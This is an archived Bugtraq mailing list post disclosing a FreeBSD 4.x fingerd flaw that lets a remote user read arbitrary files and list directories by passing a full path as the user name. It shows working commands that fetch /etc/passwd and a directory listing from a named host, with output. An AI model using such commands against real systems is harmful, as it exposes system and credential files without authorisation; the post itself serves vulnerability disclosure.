Bugtraq mailing list archives

Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable]

From: Przemyslaw Frasunek <venglin () FREEBSD LUBLIN PL>
Date: Tue, 3 Oct 2000 20:18:12 +0200

On Mon, Oct 02, 2000 at 08:56:40PM +0200, Przemyslaw Frasunek wrote:

If finger takes full path name as user name, it prints out contents of
that file.  Because fingerd executes finger as local information
provider, finger /path/to/file () some host prints /path/to/file at
some.host.


BTW. Problem persists only in 4.x branch. Of course, it allows also
to traverse directory structures:

riget:venglin:~> finger /etc/@lagoon | strings | head -n 3
[lagoon.freebsd.lublin.pl]
^@^@^L^@^D^A.^@^@^@^B^@^@^@^L^@^D^B..^@^@^@^W^A^@^T^@^D^Hdefaults^@^A^@^@^A
^@^@^T^@^H      protocols^@^@^@^B

riget:venglin:~> finger /etc/passwd@lagoon | head -n2
[lagoon.freebsd.lublin.pl]
root:*:0:0:Przemyslaw Frasunek:/home/root:/usr/local/bin/tcsh

--
* Fido: 2:480/124 ** WWW: http://www.freebsd.lublin.pl ** NIC-HDL: PMF9-RIPE *
* Inet: venglin () freebsd lublin pl ** PGP: D48684904685DF43  EA93AFA13BE170BF *

Current thread:

[sa2c () and or jp: bin/21704: enabling fingerd makes files world readable] Przemyslaw Frasunek (Oct 02)
- Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable] Przemyslaw Frasunek (Oct 04)
- Re: [sa2c () and or jp: bin/21704: enabling fingerd makes files world readable] Warner Losh (Oct 04)